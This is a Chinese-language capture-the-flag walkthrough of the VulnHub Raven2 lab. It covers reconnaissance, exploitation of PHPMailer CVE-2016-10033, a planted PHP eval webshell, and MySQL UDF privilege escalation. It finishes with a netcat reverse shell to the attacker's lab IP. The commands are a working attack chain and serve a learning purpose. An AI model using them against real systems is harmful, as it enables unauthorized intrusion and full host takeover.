Mysql udf提权靶场-vulnhub Raven2

---

前言

最近学习的时候学到了udf提权，想着来实操一下。同时也记录一下我的理解。
kail 192.168.171.141
Raven2 192.168.171.171

一、udf提权介绍

udf介绍

udf(User Defined Function)是用户自定义函数，是通过添加新函数，对MYSQL的功能进行扩充。udf的原意是为了让开发者能够自己写方便自己的函数。

如何使用udf进行提权

udf提权就是利用到创建自定义函数（sys_eval,sys_exec,do_system等），在mysql中调用这个自定义的函数（sys_eval,sys_exec,do_system等）来实现获取对方主机的system的shell权限，从而达到提权的目的。攻击者如果获取了mysql的root账号情况下，就可以尝试进行udf提权。

Mysql版本大于5.1版本：udf.dll（udf.so）文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。
Mysql版本小于5.1版本： udf.dll文件放置于c:\windows或者c:\system32
如果目录不存在则利用NTFS数据流创建文件目录

udf提权可以用于windows系统（udf.dll）也可以用于linux平台（udf.so）。
但udf提权基本上用于windows系统（毕竟服务器基本都是windows），所以linux系统中mysql版本<5.1版本udf.so该放哪里我通过网上查找也没有得到结果。如果路过的大佬知晓的话可以指点一下。

二、信息收集

主机探测

arp scan -l

确定了靶机ip 192.168.171.171.

nmap扫描

nmap -A -T4 192.168.171.171

可以看见开启了22,80，以及111端口。

/etc/hosts配置

可以看到很正常的页面

其中BLOG和contact点击后会进行跳转。

contact.php是一个发送信息的地方

看见wordpress，理所当然的要点击Log in

遇见这种情况主要是域名解析问题（有原本的192.168.171.171变为raven.local），只需要在/etc/hosts文件加入192.168.171.171 raven.local即可

到这一步，很明显我们要想到使用wpscan，但是这个靶机如果用wpscan扫的话是返回不了什么重要信息的。

dirb扫描后台

既然wpscan也不能用，线索没了就开始扫描后台

扫后台是扫出很多路径的，我基本上都尝试访问过了，这里只把重要的路径列举出来

/vendor

在/vendor/PATH文件中我们找到了第一个flag，同时也让我们知道了路径为/var/www/html。

在/vendor/VERSION中我们了解到一个版本号5.2.16

在/vendor/SECURITY.md中我们找到了关于关于PHPMailer <5.2.18的漏洞,结合刚刚我们获得的版本号5.2.16，猜测应该是这个网站运用了phpmailer同时版本是5.2.16，上网查找【CVE-2016-10033】发现是可以远程代码执行的，那么我们就可以利用这个漏洞尝试getshell。

三、getshell

利用CVE-2016-10033

searchsploit phpmailer

cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root

该脚本还要进行修改

至于target的路径为什么是/contact.php，是因为利用该漏洞时攻击者主要在常见的web表单如意见反悔表单、注册表单中 ，邮件密码重置表单等使用发送的组件功能时利用此漏洞。而在信息收集时我们知道contact.php就有发送信息的功能。

python3 40974.py

接下来访问192.168.171.171/hack.php就可以反弹shell了

蚁剑上线

获取交互性shell

python -c 'import pty; pty.spawn("/bin/bash")'
echo '<?php eval($_POST['123456']);?>' >> hack.php

蚁剑链接

因为有wordpress文件存在，肯定要看一下wordpress-config.php文件的

可以看到我们获取了mysql数据库的用户和密码，并且用户是root

user：root passwd:R@v3nSecurity

四、udf提权

数据库信息收集及脚本下载

登录数据库

show global variables like 'secure%';

如果secure_file_priv值为空则可写，为指定路径则是指定路径可写。

show variables like '%compile%'; 

可以看到系统为linux(x86_64)这可以确定等下我们要用的脚本。

select @@plugin_dir #查找具体目录
select @@basedir;#查看mysql目录

kali:
find / -name "*mysqludf*" 2>/dev/null
cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so /root
python3 -m http.server 8000 #开启python3自带http服务 8000端口
Raven2：
cd /tmp
wget http://192.168。171.171:8000/lib_mysqludf_sys_64.so

提权

use mysql;
create table hack(line blob); #新建一个表，用来存放本地传来的udf文件的内容
insert into hack values(load_file('/tmp/lib_mysqludf_sys_64.so'));  #在hack中写入udf文件内容
select * from hack into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';  #将udf文件内容传入新建的udf文件中
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';  #导入udf函数
select sys_exec('nc 192.168.171.141 6666 -e /bin/bash'); #执行

提权成功